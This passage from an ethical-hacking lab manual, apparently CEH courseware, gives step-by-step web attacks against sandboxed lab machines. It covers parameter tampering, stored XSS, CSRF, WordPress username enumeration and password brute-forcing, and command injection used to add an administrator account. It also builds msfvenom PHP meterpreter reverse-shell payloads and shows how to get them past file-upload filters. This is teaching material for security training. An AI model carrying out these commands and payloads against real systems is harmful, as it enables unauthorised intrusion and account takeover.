17. Switch back to the Burp Suite window and observe that the HTTP
request was intercepted by the application.

You can observe that the entered login credentials were intercepted by the
Burp Suite.
18. Now, keep clicking the Forward button until you are logged into the user
account.
19. Switch to the browser, and observe that you are now logged into the user
account, as shown in the screenshot.

20. Now, click the View Profile tab from the menu bar to view the user
information.
21. After clicking the View Profile tab, switch back to the Burp
Suite window and keep clicking the Forward button until you get the HTTP
request, as shown in the screenshot.

22. Now, navigate to the Params tab under the Intercept tab to view the
captured parameters.
23. Under the Params tab, observe a table with captured values such
as URL and Cookie.

24. In the URL type with the name id, double-click the Value column to
change it from 1 to 2, as shown in the screenshot.
25. After changing the value, navigate back to the Raw tab.
26. In the Raw tab, click the Intercept is on button to turn off the
interception.
27. After switching off the interception, navigate back to the browser window
and observe that the user account associated with ID=2 appears with the
name John, as shown in the screenshot.

Although we logged in using sam as a username with ID=1, using Burp Suite,
we successfully tampered with the ID parameter to obtain information about
other user accounts.
28. Similarly, you can edit the id parameter in Burp Suite with any random
numeric value to view information about other user accounts.

29. Switch to the browser window and perform Steps 4-6. Remove the
browser proxy set up in Step 7, by selecting the No proxy radio-button in
the Connection Settings window and click OK. Close the tab.
30. This concludes the demonstration of how to perform parameter
tampering using Burp Suite.

31. Close all open windows and document all the acquired information.

Task 3: Exploit Parameter Tampering and XSS Vulnerabilities


in Web Applications
Parameter tampering is a simple form of attack aimed directly at an application’s
business logic. A parameter tampering attack exploits vulnerabilities in integrity and
logic validation mechanisms that may result in XSS or SQL injection exploitation.

XSS attacks exploit vulnerabilities in dynamically generated web pages, which enables
malicious attackers to inject client-side script into web pages viewed by other users.
Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash code for
execution on a victim’s system by hiding it within legitimate requests.
Although implementing a strict application security routine, parameters, and input
validation can minimize parameter tampering and XSS vulnerabilities, many websites
and web applications are still vulnerable to these security threats.

Attacking web applications through parameter tampering and XSS vulnerabilities is one
of the steps an attacker takes in attempting to compromise a web application’s security.
An expert ethical hacker and pen tester should be aware of the different parameter
tampering and XSS methods that can be employed by an attacker to hack web
applications.

Here, we will learn how to exploit parameter tampering and XSS vulnerabilities in the
target web application.

In this task, the target website (www.moviescope.com) is hosted by the victim


machine Windows Server 2019. Here, the host machine is the Windows 10 machine.
1. Click Windows 10 to switch to the Windows 10 machine.
2. Launch any browser, in this lab we are using Mozilla Firefox. In the
address bar of the browser place your mouse cursor and
click http://www.moviescope.com and press Enter.

3. The MovieScope website appears. In the Login form,


type Username and Password as steve and password, and click Login.

Here, we are logging in as a registered user on the website.


4. You are logged into the website. Click the View Profile tab from the
menu bar.

5. You will be redirected to the profile page, which displays the personal
information of steve (here, you). You will observe that the value of ID in the
personal information and address bar is 4.
6. Now, try to change the parameter in the address bar to id=1 and
press Enter.

7. You will be redirected to the profile of sam without having to perform any
hacking techniques to explore the database. Here, you can observe Sam’s
personal information under the View Profile tab, as shown in the
screenshot.
8. Now, try the parameter id=3 in the address bar and press Enter.

9. You get the profile for kety. This way, you can change the id number and
obtain profile information for different users.

This process of changing the ID value and getting the result is known as
parameter tampering. Web XSS attacks exploit vulnerabilities on dynamically
generated web pages. This enables malicious attackers to inject client-side
scripts into the web pages viewed by other users.
10. Now, click the Contacts tab. Here you will be performing an XSS attack.
11. The Contacts page appears; enter your name or any random name
(here, steve) in the Name field; enter the cross-site script as shown in the
screenshot in the Comment field and click the Submit Comment button.

12. On this page, you are testing for XSS vulnerability. Now, refresh
the Contacts page.

If a notification appears saying To display this page, Firefox must send


information…, click the Resend button.
13. You have successfully added a malicious script to this page. The
comment with the malicious link is stored on the server.

14. Click Windows Server 2019 to switch to the Windows Server


2019 machine. Click Ctrl+Alt+Delete to activate the machine, by
default, Administrator account is selected, click Pa$$w0rd to enter the
password and press Enter.
15. Launch any browser, in this lab we are using Google Chrome. In the
address bar of the browser place your mouse cursor and
click http://www.moviescope.com and press Enter.

16. The MovieScope website appears. In the Login form, type


the Username and Password as sam and test and click Login.

Here, we are logging in as the victim.


17. You are logged into the website as a legitimate user. Click
the Contacts tab from the menu bar.
18. As soon as you click the Contacts tab, the cross-site script running on
the backend server is executed, and a pop-up appears, stating, You are
hacked.

19. Similarly, whenever a user attempts to visit the Contacts page, the alert
pops up as soon as the page is loaded.

20. This concludes the demonstration of how to exploit parameter tampering


and XSS vulnerabilities in web applications.

21. Close all open windows and document all the acquired information.

Task 4: Perform Cross-site Request Forgery (CSRF) Attack


CSRF, also known as a one-click attack, occurs when a hacker instructs a user’s web
browser to send a request to the vulnerable website through a malicious web page.
Financial websites commonly contain CSRF vulnerabilities. Usually, outside attackers
cannot access corporate intranets, so CSRF is one of the methods used to enter these
networks. The inability of web applications to differentiate a request made using
malicious code from a genuine request exposes it to the CSRF attack. These attacks
exploit web page vulnerabilities that allow an attacker to force an unsuspecting user’s
browser to send malicious requests that they did not intend.
CSRF attacks can be performed using various techniques and tools. Here, we will
perform a CSRF attack using WPScan.

In this task, the target WordPress website (http://10.10.10.16:8080/CEH) is hosted by


the victim machine Windows Server 2016. Here, the host machine is the Parrot
Security machine.
1. Click Windows Server 2016 to switch to the Windows Server
2016 machine.

2. Click Ctrl+Alt+Delete to activate the machine, by default, CEH\


Administrator account is selected, click Pa$$w0rd to enter the password
and press Enter.
3. Now, in the right corner of Desktop, click the Show hidden icons icon,
observe that the WampServer icon appears.

4. Wait for this icon to turn green, which indicates that the WampServer is
successfully running.
5. Now, open any web browser (here, Mozilla Firefox). In the address bar
place your mouse cursor, click http://10.10.10.16:8080/CEH/wp-
login.php? and press Enter.

Here, we are opening the above-mentioned website as the victim.


6. A WordPress webpage appears. Type Username or Email
Address and Password as admin and qwerty@123. Click the Log
In button.
7. Assume that you have installed and configured the Firewall plugin for
this site and that you want to check the security configurations.

8. Hover your mouse cursor on Plugins in the left pane and click Installed
Plugins, as shown in the screenshot.
9. In the Plugins page, observe that leenk.me is installed.
Click Activate under the leenk.me plugin to activate the plugin.
10. Refresh the page and you will observe that the leenk.me plugin option
appears in the left pane; click it.

Refresh the page if leenk.me does not appear on the left pane.
11. The leenk.me General Settings page appears. Tick
the Facebook checkbox in the Choose which social network modules
you want to enable for this site option under the Administrator
Options section and click the Save Settings button.

12. The leenk.me General Settings page appears, as shown in the


screenshot. Ensure that under the Administrator Options section,
the Facebook checkbox is selected in the Choose which social network
modules you want to enable for this site option and click the Facebook
Settings hyperlink.

13. A Facebook Settings page appears; under Message Settings, enter


the details below:

o Default Message: This is CEH lab.


o Default Link Name: CEH.com
o Default Caption: CEH Labs
14. Clear the Default Description text field. Leave the other settings to
default and click the Save Settings button to save the settings.
15. Click Parrot Security to switch to the Parrot Security machine.
16. Click the Applications icon from the top section of Desktop and
navigate to Internet --> Google Chrome browser.
17. The Google Chrome window appears.
Type https://wpscan.com/register into the address bar and press Enter.

18. A webpage with a Register new user form appears; scroll down and in
the Required fields enter your personal details. Check By ticking this box
you agree to our terms checkbox..
19. Now, scroll down to the end of the page, click I'm not a robot and click
on Register button.

If Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
If a captcha window appears, verify it.
20. A notification saying A message with a confirmation link has been
sent to your email address….

21. Now, open a new tab in the Chrome browser and open the email account
you gave while registering as a new user in Step 18.

22. Once you are logged into your email account, open the email
from noreply@wpvulndb.com, and in the email, click the Confirm my
account hyperlink.

If you get any error while accessing website content in Parrot Security
machine, then browse the same website in your local machine, login into
your account and perform the following steps.
23. A new webpage appears with a message saying Your email address
has been successfully confirmed. Enter the same details in the Email
Address and Password fields that you provided in Step 18.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
24. You get signed in successfully in the website. Now, click the Free
usage button under the Choose a plan section.
25. The Edit Profile page appears; in the API Token section and observe
the API Token. Note down or copy this API Token; we will use this token in
the later steps.
26. Close the Google Chrome browser window.

27. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.
28. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

29. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


30. Now, type cd and press Enter to jump to the root directory.
31. In the Terminal window, type wpscan --api-token [API Token from
Step#25] --url http://10.10.10.16:8080/CEH --plugins-detection
aggressive --enumerate vp and press Enter.

--enumerate vp: specifies the enumeration of vulnerable plugins.


32. The result appears, displaying detailed information regarding the target
website.
33. Scroll down to the Plugin(s) Identified section, and observe the
installed vulnerable plugins (akismet and leenkme) on the target website.

34. In this task, we will exploit the CSRF vulnerability present in


the leenkme plugin.
35. Minimize the Terminal window. Click the Places menu at the top
of Desktop and click Desktop from the drop-down options.
36. The Desktop window appears, copy Security_Script.html file.
37. Click the Places menu at the top of Desktop and click Network from
the drop-down options.
38. The Network window appears; press the Ctrl+L keys. A Location field
appears; type smb://10.10.10.10 and press Enter to access the Windows
10 shared folders.
39. A security pop-up appears; enter the Windows 10 machine credentials
(Username: Admin and Password: Pa$$w0rd) and click Connect.
40. The Windows shares on 10.10.10.10 window appears; double-click
the CEH-Tools folder.
41. Navigate to CEHv11 Module 14 Hacking Web Applications and
paste Security_Script.html script.
42. Click Windows Server 2016 to switch to the Windows Server
2016 machine Click Ctrl+Alt+Delete to activate the machine, by
default, CEH\Administrator account is selected, click Pa$$w0rd to enter
the password and press Enter.
43. Navigate to the location Z:\CEHv11 Module 14 Hacking Web
Applications (shared network drive), copy the Security_Script.html file,
and paste it onto Desktop.
44. Right-click the Security_Script.html file and navigate to Open with --
> Firefox.

You should use the same browser that was used in Step 5.
45. The Security_Script.html file opens up in the Mozilla Firefox browser,
along with a pop-up; click OK to continue.
46. You will be redirected to the Facebook Settings page of
the leenk.me plugin page. Observe that the field values have been
changed, indicating a successful CSRF attack on the website, as shown in the
screenshot.

47. This concludes the demonstration of how to perform a CSRF attack on a


target website.

48. Close all open windows on both the machines (Window Server
2016 and Parrot Security) and document all the acquired information.

Task 5: Enumerate and Hack a Web Application using


WPScan and Metasploit
The Metasploit Framework is a penetration testing toolkit, exploit development
platform, and research tool that includes hundreds of working remote exploits for a
variety of platforms. It helps pen testers to verify vulnerabilities and manage security
assessments.

In this task, we will perform multiple attacks on a vulnerable PHP website (WordPress) in
an attempt to gain sensitive information such as usernames and passwords. You will
also learn how to use the WPScan tool to enumerate usernames on a WordPress
website, and how to crack passwords by performing a dictionary attack using an msf
auxiliary module.

Ensure that the Wampserver is running in Windows Server 2016. To


launch Wampserver, switch to the Windows Server 2016 and double-click
on Wampserver icon, present on the Desktop.
1. Click Parrot Security to switch to the Parrot Security machine.
2. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

3. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

If a Question pop-up window appears, asking for you to update the


machine, click No to close the window.
4. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


5. Now, type cd and press Enter to jump to the root directory.
6. In the Terminal window, type wpscan --api-token [API Token] --url
http://10.10.10.16:8080/CEH --enumerate u and press Enter.

--enumerate u: specifies the enumeration of usernames.


Here, we will use the API token that we obtained by registering with
the https://wpscan.com/register website.
7. WPScan begins to enumerate the usernames stored in the website’s
database. The result appears, displaying detailed information from the target
website.

8. Scroll down to the User(s) Identified section and observe the


information regarding the available user accounts.
9. Now that you have successfully obtained the usernames stored in the
database, you need to find their passwords.

10. To obtain the passwords, you will use the auxiliary module
called wordpress_login_enum (in msfconsole) to perform a dictionary
attack using the password.txt file (in the Wordlist folder) which you copied
to the location /home/attacker/Desktop/CEHv11 Module 14 Hacking
Web Applications.

11. To use the wordpress_login_enum auxiliary module, you need to first


launch msfconsole. However, before this, you need to start the PostgreSQL
service.

12. In the terminal window, type service postgresql start and


press Enter to start the PostgreSQL service.
13. Type msfconsole and press Enter to launch the Metasploit framework.

14. In msfconsole, type use


auxiliary/scanner/http/wordpress_login_enum and press Enter.
15. This module allows you to enumerate the login credentials.

16. To know all options available to configure in this Metasploit module,


type show options, and press Enter.

17. This provides a list of options that can be set for this module. As we must
obtain the password for the target user account, we will set the below
options:

o PASS_FILE: Sets the password.txt file, using which; you will perform
the dictionary attack
o RHOST: Sets the target machine (here, the Windows Server
2016 IP address)
o RPORT: Sets the target machine port (here, the Windows Server
2016 port)
o TARGETURI: Sets the base path to the WordPress website
(here, http://[IP Address of Windows Server 2016]:8080/CEH]
o USERNAME: Sets the username that was obtained in Step 8.
(here, admin)
18. Now, in the msfconsole, type the below commands:

o Type set PASS_FILE /home/attacker/Desktop/CEHv11 Module 14


Hacking Web Applications/Wordlist/password.txt and
press Enter to set the file containing the passwords. (here, we are
using the password.txt password file).
o Type set RHOSTS [IP Address of Windows Server
2016] (here, 10.10.10.16) and press Enter to set the target IP
address. (Here, the IP address of Windows Server
2016 is 10.10.10.16).
o Type set RPORT 8080 and press Enter to set the target port.
o Type set TARGETURI http://[IP Address of Windows Server
2016]:8080/CEH and press Enter to set the base path to the
WordPress website (Here, the IP address of Windows Server
2016 is 10.10.10.16).
o Type set USERNAME admin and press Enter to set the username
as admin.
You may issue any one of the usernames that you have obtained during the
enumeration process in Step 8. In this task, the admin user is being issued.
19. All the options have successfully been set. Type run and press Enter to
execute the auxiliary module.

20. Observe that the auxiliary module initially enumerates details such as the
ID number and the stored location of the username admin, and then begins
to brute-force the login credentials by trying various passwords for the given
username.
21. The auxiliary module tests various passwords against the given username
(admin) and the cracked password is displayed, as shown in the screenshot.

Here, the cracked password is qwerty@123, which might differ in your lab
environment.
22. Now, use the obtained username-password combination to log into the
WordPress website. (Here, Username: admin and Password: qwerty@123).

23. Now, click the Firefox icon from the top section of Desktop to launch
the Mozilla Firefox browser.

24. In the address field, type http://[IP Address of Windows Server


2016]:8080/CEH/wp-login.php in the address bar and click the Log
In button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
25. Observe that you are successfully logged into the target WordPress
website (http://10.10.10.16:8080/CEH) and that you can see the website
content.
26. Similarly, you can crack the passwords of other users by firstly selecting
a particular username from Step 8, and then perform Steps 12-21.

27. This concludes the demonstration of how to enumerate and hack a web
application using WPScan and Metasploit.

28. Close all open windows on both the machines (Windows Server
2016 and Parrot Security) and document all the acquired information.

Task 6: Exploit a Remote Command Execution Vulnerability to


Compromise a Target Web Server
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is extremely
vulnerable. The main objective of DVWA is to aid security professionals in testing their
skills and tools in a legal environment, to help web developers better understand the
processes of securing web applications, and to aid teachers and students in teaching
and learning web application security in a classroom environment.
In this task, we will perform command-line execution on a vulnerability found in DVWA.
Here, you will learn how to extract information about a target machine, create a user
account, assign administrative privileges to the created account, and use that account
to log in to the target machine.

1. Click Windows 10 to switch to the Windows 10 machine.


2. Launch any browser, in this lab we are using Mozilla Firefox. In the
address bar of the browser place your mouse cursor and
click http://10.10.10.16:8080/dvwa/login.php and press Enter

The IP address of the Windows Server 2016 in this lab is 10.10.10.16,


which might vary in your lab environment.
3. The DVWA login page appears; type
the Username and Password as gordonb and abc123. Click
the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.

4. You are successfully logged in, and the DVWA main webpage appears.
Click Command Injection from the options available in the left pane.
5. The Vulnerability: Command Injection page appears; under the Ping
a device section, type the IP address of the Windows Server
2016 machine (here, 10.10.10.16) into the Enter an IP address field and
click the Submit button to ping the machine.

The command injection utility in DVWA allows you to ping the target
machine.
6. DVWA successfully pings the target machine, as shown in the
screenshot.
7. Now, try to issue a different command to check whether DVWA can
execute it.

8. Type | hostname into the Enter an IP address field and click Submit.
This command is used to probe the hostname of the target machine.

9. As you have issued a command instead of entering the IP address of a


machine, the application returns an error, as shown in the screenshot.
10. The result indicates that the DVWA application is secure.

11. Now, check the security setting of the web application. To do so,
click DVWA Security in the left pane.

12. The DVWA Security page appears. Observe that the security level
is Impossible. This security setting was blocking you from executing
commands other than simply pinging a machine.

13. Now, to exploit the command execution vulnerability, set the Security
Level of the web application to low by selecting the option Low from the
drop-down list and click Submit.

Here, your intention would be to show that a weakly secured web application
is the prime focus of attackers, who seek to exploit its vulnerabilities.
14. You have configured a weak security setting in DVWA. Now, try to
execute a command other than ping.

15. Click Command Injection from the left-pane.

16. The Vulnerability: Command Injection page appears; type |


hostname into the Enter an IP address field, and click Submit.

17. DVWA returns the name of the Windows Server 2016 machine, as
shown in the screenshot.
18. This infers that the command execution field is vulnerable and that you
can remotely execute commands.

19. Now, extract more information regarding the target machine, Windows
Server 2016.

20. Type the command | whoami and click Submit.


21. The application displays the user, group, and privileges information for
the user currently logged onto the Windows Server 2016 machine, as
shown in the screenshot.
22. Now, type | tasklist, and click Submit to view the processes running on
the machine.
23. A list of all the running processes on the Windows Server
2016 machine is displayed, as shown in the screenshot.

24. To check if you can terminate a process, choose any process from the list
(here, Microsoft.ActiveDirectory), and note down its process PID
(here, 2172).

The list of running processes might differ in your lab environment.


25. Type | Taskkill /PID [Process ID value of the desired
process] /F (here, PID is 2172) and click Submit. By issuing this command,
you are forcefully (/F) terminating the process.
26. The process will be successfully terminated, as shown in the screenshot.

To confirm that the process has successfully been terminated, you can issue
the | tasklist command again to check the running processes.
27. Now, to view the directory structure of the Windows Server
2016 machine, type | dir C:\ and click Submit to view the files and
directories on the C:\ drive.
28. The directory structure of the C drive of the target server (Windows
Server 2016) is displayed, as shown in the screenshot.
29. In the same way, you can issue commands to view other directories.

30. Now, try to obtain information related to user accounts.

31. To view user account information, type | net user, and click Submit.

32. DVWA obtains user account information from the Windows Server
2016 machine and lists, as shown in the screenshot.
33. Now, use the command execution vulnerability and attempt to add a user
account remotely.

34. Create an account named Test. To do so, type | net user Test /Add and
click Submit.
35. The command completed successfully notification appears and a user
account named Test is created.
36. To view the new user account, type the command | net user and
click Submit.

37. You can observe the newly created account Test, as shown in the
screenshot.

38. Now, view the new account’s information. Type | net user Test and
click Submit.
39. The Test account information appears. You can see that Test is a
standard user account and does not have administrative privileges. You can
see that it has an entry called Local Group Memberships.
40. Now, assign administrative privileges to the account. The reason for
granting administrative privileges to this account is to use this (admin)
account to log into the Windows Server 2016 machine with administrator
access using a remote desktop connection.

41. To grant administrative privileges, type | net localgroup


Administrators Test /Add and click Submit.
42. You have successfully granted admin privileges to the account. Confirm
the new setting by issuing the command | net user Test. Test is now an
administrator account under the Local Group Memberships option.
43. Now, log into the Windows Server 2016 machine using
the Test account through Remote Desktop Connection.

44. Click the Type here to search field from the bottom of Desktop and
type Remote. Click Remote Desktop Connection from the results.

45. The Remote Desktop Connection window appears. In


the Computer field, type the target system IP address
(here, 10.10.10.16 [Windows Server 2016]) and click Show Options.
46. The Remote Desktop Connection window appears with
the General tab displayed; enter the User name as test and
click Connect.
47. A Windows Security pop-up appears; leave the Password field empty
and click OK.
48. A Remote Desktop Connection window appears; click Yes.

49. A remote desktop connection is successfully established, as shown in the


screenshot.

Thus, you have made use of a command execution vulnerability in a DVWA


application hosted by the Windows Server 2016 machine, extracted
information related to the machine, remotely created an administrator
account, and logged into it.
50. Now, you may discontinue the session and log out of the web application.
To do so, close the Remote Desktop Connection window. If
a Your remote session will be disconnected notification appears,
click OK.

51. This concludes the demonstration of how to exploit a remote command


execution vulnerability to compromise a target web server.

52. Close all open windows and document all the acquired information.

Task 7: Exploit a File Upload Vulnerability at Different


Security Levels
Metasploit Framework is a tool for developing and executing exploit code against a
remote target machine. It is a Ruby-based, modular penetration testing platform that
enables you to write, test, and execute exploit code. It contains a suite of tools that you
can use to test security vulnerabilities, enumerate networks, execute attacks, and
evade detection. Meterpreter is a Metasploit attack payload that provides an interactive
shell that can be used to explore the target machine and execute code.

Here, we will use exploit a file upload vulnerability at different security levels of DVWA
using Metasploit.
Before starting this task, ensure that the WampServer is running on the Windows
Server 2016 machine.
1. Click Parrot Security to switch to the Parrot Security machine.
2. Click the MATE Terminal icon at the top of Desktop to open
a Terminal window.

3. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

4. In the [sudo] password for attacker field, type toor as a password


and press Enter.

The password that you type will not be visible.


5. Now, type cd and press Enter to jump to the root directory.
6. In the Terminal window appears; type msfvenom -p
php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine]
LPORT=4444 -f raw and press Enter.

Here, the IP address of the host machine is 10.10.10.13 (the Parrot


Security machine).
7. The raw payload is generated in the terminal window. Select the payload,
right-click on it, and click Copy from the context menu to copy the payload,
as shown in the screenshot.
8. Now, in the terminal window, type cd /home/attacker/Desktop/ and
press Enter to navigate to the Desktop.

9. Type pluma upload.php and press Enter to launch the Pluma text
editor.
10. The Pluma text editor window appears; press Ctrl+V to paste the raw
payload copied in Step 7, and then press Ctrl+S to save the context.
11. Close all the open windows.

12. Click the Firefox icon from the top section of Desktop,
type http://10.10.10.16:8080/dvwa/login.php. Into the address bar and
press Enter.

13. The DVWA login page appears; enter


the Username and Password as admin and password. Click
the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
14. The Welcome to Damn Vulnerable Web Application! Page appears.
Click DVWA Security in the left pane to view the DVWA security level.

15. Change the security level from impossible to low by selecting Low from
the drop-down list and clicking the Submit button, as shown in the
screenshot.
16. Click the File Upload option from the left pane.

17. The Vulnerability: File Upload page appears; click


the Browse… button to upload a file.
18. When the File Upload window appears, navigate to
the Desktop location, select the payload file upload.php, and click Open.
19. Observe that the selected file (upload.php) appears to the right
of Browse… button.

20. Now, click the Upload button to upload the file to the database.
21. You will see a message saying that the file has been uploaded
successfully, with the location of the file. Note the location of the file and
minimize the browser window.
22. Launch a Terminal window by clicking on the MATE Terminal icon at
the top of Desktop.

23. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

24. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


25. Now, type cd and press Enter to jump to the root directory.
26. In the Terminal window, type msfconsole and press Enter to launch
the Metasploit framework.

27. In msfconsole, type use exploit/multi/handler and press Enter to set


up the listener.
28. Now, set the payload, LHOST, and LPORT. To do so, use the below
commands:

o Type set payload php/meterpreter/reverse_tcp and press Enter


o Type set LHOST 10.10.10.13 and press Enter
o Type set LPORT 4444 and press Enter
o Type run and press Enter to start the listener
29. Observe that the listener is up and running at 10.10.10.13. Minimize the
terminal window.
30. Switch back to the Mozilla Firefox window where the DVWA website is
open. Open a new tab,
type http://10.10.10.16:8080/dvwa/hackable/uploads/upload.php in
the address bar, and press Enter to execute the uploaded payload.
31. Switch back to the Terminal window and observe that a Meterpreter
session has successfully been established with the victim system, as shown
in the screenshot.
32. In the meterpreter command line, type sysinfo and press Enter to view
the system details of the victim machine.
33. Close all open windows.

34. Launch a new Terminal window by clicking on the MATE Terminal icon
at the top of Desktop window.

35. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

36. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


37. Now, type cd and press Enter to jump to the root directory.
38. In the Terminal window, type msfvenom -p
php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine]
LPORT=3333 -f raw and press Enter.

Here, the IP address of the host machine is 10.10.10.13 (Parrot


Security machine).
39. The raw payload is generated in the terminal window. Select the payload,
right-click on it, and click Copy from the context menu to copy the payload,
as shown in the screenshot.
40. Now, in the terminal window, type cd /home/attacker/Desktop/ and
press Enter to navigate to the Desktop.

41. Type pluma medium.php.jpg and press Enter to launch


the Pluma text editor.
42. The Pluma text editor window appears; press Ctrl+V to paste the raw
payload copied in Step 39, and then press Ctrl+S to save the context.
43. Click the Firefox icon from the top section of Desktop,
type http://10.10.10.16:8080/dvwa/login.php. Into the address bar, and
press Enter. The DVWA login page appears; log in with the
credentials admin and password, and click the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
44. The Welcome to Damn Vulnerable Web Application! Page appears.
Click DVWA Security from the left pane to view the DVWA security level.

45. Change the Security Level from impossible to medium by


selecting Medium from the drop-down list and clicking the Submit button,
as shown in the screenshot.
46. Click the File Upload option in the left pane.

47. The Vulnerability: File Upload page appears; click


the Browse… button to upload a file.
48. The File Upload window appears. Navigate to the Desktop location and
select the payload file medium.php.jpg and click Open.
49. Observe that the selected file (medium.php.jpg) appears to the right
of the Browse… button.

50. Now, before uploading the file, set up a Burp Suite proxy. Start by
configuring the proxy settings of the browser.

51. Click the Open Menu icon in the right corner of the menu bar and
select Preferences from the list.
52. The General settings tab appears. In the Find in Preferences search
bar, type proxy, and press Enter.

53. The Search Results appear; click the Settings button under
the Network Settings option.
54. A Connection Settings window appears; select the Manual proxy
configuration radio button and ensure that the HTTP Proxy is set
to 127.0.0.1 and Port as 8080. Ensure that the Use this proxy server for
all protocols checkbox is selected and click OK. Close
the Preferences tab.
55. Now, minimize the browser window, click Applications from the top left
corner of Desktop and navigate to Pentesting --> Web Application
Analysis --> Web Application Proxies --> burpsuite to launch the Burp
Suite application.
56. A security pop-up appears, enter the password as toor in
the Password field and click OK.
57. In the next Burp Suite Community Edition notification, click OK.
58. A notification appears saying that An update is available, click Close.

59. The Burp Suite main window appears. Ensure that the Temporary
project radio button is selected and click the Next button, as shown in the
screenshot.
60. In the next window, select the Use Burp defaults radio-button and click
the Start Burp button.
61. The Burp Suite main window appears; click the Proxy tab from the
available options in the top section of the window.
62. In the Proxy settings, by default, the Intercept tab opens-up. Observe
that the interception is active by default, as the button says Intercept is on.
Leave it running.

Turn the interception on if it is set to off.


63. Switch back to the browser window and click the Upload button under
the Vulnerability: File Upload section to upload the payload file.
64. Switch back to the Burp Suite window. Observe that the request has
been captured and displayed in the raw format under the Raw tab. In
the filename field, you will see the name of the file to be uploaded
as medium.php.jpg.
65. Change the filename to medium.php and click the Forward button to
forward the request.
66. Now, turn the interception off by clicking on the Intercept is on button.
The button now says Intercept is off, as shown in the screenshot. Close the
window.

If a Confirm pop-up appears, click Yes.


67. Switch back to the browser window. Observe a message saying that the
file has been uploaded successfully, along with the upload location of the file.
Note down this location.
68. Remove the browser proxy set up in Step 54 by selecting the No
proxy radio-button in the Connection Settings window and clicking OK.
Close the tab.
69. Launch a Terminal window by clicking on the MATE Terminal icon at
the top of Desktop.

70. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

71. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


72. Now, type cd and press Enter to jump to the root directory.
73. In the Terminal window, type msfconsole and press Enter to launch
the Metasploit framework.

74. In msfconsole, type use exploit/multi/handler and press Enter to


begin setting up the listener.

75. You have to set up a listener so that you can establish


a Meterpreter session with your victim. Follow the steps given below to set
up a listener using the msf command line:

o Type set payload php/meterpreter/reverse_tcp and press Enter


o Type set LHOST 10.10.10.13 and press Enter
o Type set LPORT 3333 and press Enter.
o Type run and press Enter to start the listener
76. Switch to the Mozilla Firefox window where the DVWA website is open.
Open a new tab,
type http://10.10.10.16:8080/dvwa/hackable/uploads/medium.php int
o the address bar and press Enter to execute the uploaded payload.
77. Switch back to the Terminal window and observe that a Meterpreter
session has successfully been established with the victim system.
78. In the meterpreter command line, type sysinfo and press Enter to view
the system details of the victim machine.
79. Close all open windows.

80. Launch a Terminal window by clicking on the MATE Terminal icon at


the top of Desktop.

81. In the terminal window, type sudo su and press Enter to run the
programs as a root user.

82. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


83. Now, type cd and press Enter to jump to the root directory.
84. In the Terminal window, type msfvenom -p
php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine]
LPORT=2222 -f raw and press Enter.

Here, the IP address of the host machine is 10.10.10.13 (Parrot


Security machine).
85. The raw payload is generated in the terminal window. Select the payload,
right-click on it, and click Copy from the context menu to copy the payload,
as shown in the screenshot.
86. Now, in the terminal window, type cd /home/attacker/Desktop/ and
press Enter to navigate to the Desktop.

87. Type pluma high.jpeg and press Enter to launch the Pluma text editor.
88. The Pluma text editor window appears; press Ctrl+V to paste the raw
payload copied in Step 85. Edit the payload file by adding GIF98 to the first
line and then press Ctrl+S to save the context.
89. Close all open windows.

90. Click the Firefox icon from the top section of Desktop,
type http://10.10.10.16:8080/dvwa/login.php into the address bar and
press Enter. The DVWA login page appears. Log in with the
credentials admin and password, and click the Login button.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
91. The Welcome to Damn Vulnerable Web Application! Page appears;
click DVWA Security in the left pane to view the DVWA security level.

92. Change the Security Level from impossible to high by


selecting High from the drop-down list and clicking the Submit button, as
shown in the screenshot.
93. Click the File Upload option in the left pane. The Vulnerability: File
Upload page appears. Click the Browse… button to upload a file.
94. The File Upload window appears. Navigate to the Desktop location,
select the payload file high.jpeg, and click Open.
95. Observe that the selected file (high.jpeg) appears to the right of
the Browse… button.

96. Now, click the Upload button to upload the file to the database.
97. You will see a message saying that the file has been uploaded
successfully, along with the location of the uploaded file. Note down this
location.
98. Now, click the Command Injection option in the left pane.
The Vulnerability: Command Injection window appears; in the Enter an
IP address field, type |copy C:\wamp64\www\DVWA\hackable\uploads\
high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php and
click the Submit button.
99. Observe a message saying that the file has been copied, as shown in the
screenshot.
100. Launch a Terminal window by clicking on the MATE Terminal icon at
the top of Desktop.

101. A Parrot Terminal window appears. In the terminal window,


type sudo su and press Enter to run the programs as a root user.

102. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


103. Now, type cd and press Enter to jump to the root directory.
104. In the Terminal window, type msfconsole and press Enter to launch
the Metasploit framework.

105. In msfconsole, type use exploit/multi/handler and press Enter to


begin setting up the listener.

106. You have to set up a listener so that you can establish


a Meterpreter session with your victim. Follow the steps given below to set
up a listener using the msf command line:

o Type set payload php/meterpreter/reverse_tcp and press Enter


o Type set LHOST 10.10.10.13 and press Enter
o Type set LPORT 2222 and press Enter.
o Type run and press Enter to start the listener
